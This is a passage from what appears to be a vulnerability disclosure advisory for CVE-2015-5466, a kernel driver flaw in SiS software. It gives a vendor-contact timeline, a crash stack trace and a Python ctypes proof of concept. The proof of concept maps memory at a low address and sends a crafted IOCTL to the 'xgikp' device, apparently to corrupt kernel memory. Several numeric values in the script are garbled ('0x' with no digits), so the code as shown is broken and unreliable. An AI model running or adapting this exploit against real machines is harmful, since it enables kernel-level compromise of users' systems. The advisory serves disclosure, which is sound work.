 14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
 15 0021f6c0 1e07bd9c _ctypes+0x54d8
 16   python27!PyObject_Call+0x4c


4. Mitigation and Remediation Recommendation

 No response from vendor; no remediation available.

5. Credit

 This vulnerability was discovered by Matt Bergin of KoreLogic
 Security, Inc.

6. Disclosure Timeline

 2015.05.14 - Initial contact; requested security contact.
 2015.05.18 - Second contact attempt.
 2015.05.25 - Third contact attempt.
 2015.07.02 - KoreLogic requests CVE from Mitre.
 2015.07.10 - Mitre issues CVE-2015-5466.
 2015.07.28 - 45 business days have elapsed since KoreLogic last
  attempted to contact SiS without a response.
 2015.09.01 - Public disclosure.

7. Proof of Concept

 from sys import exit
 from ctypes import *
 NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
 WriteProcessMemory = windll.kernel32.WriteProcessMemory
 DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
 CreateFileA = windll.kernel32.CreateFileA
 CloseHandle = windll.kernel32.CloseHandle
 FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
 OPEN_EXISTING = 3
 NULL = None

 device = "xgikp"
 code = 0x96002404
 inlen = 0xe6b6
 outlen = 0x0
 inbuf = 0x1
 outbuf = 0x
 inBufMem = "\x90"*inlen

 def main():
     try:
         handle = CreateFileA(".\\%s" % (device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
         if (handle == -1):
             print "[-] error creating handle"
             exit(1)
     except Exception as e:
         print "[-] error creating handle"
         exit(1)

     NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0x)),0x1000|0x2000,0x40)
     WriteProcessMemory(-1,0x1,inBufMem,inlen,byref(c_int(0)))

     DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,inlen,outbuf,outlen)
     CloseHandle(handle)
     return False

 if __name__=="__main__":
     main()


The contents o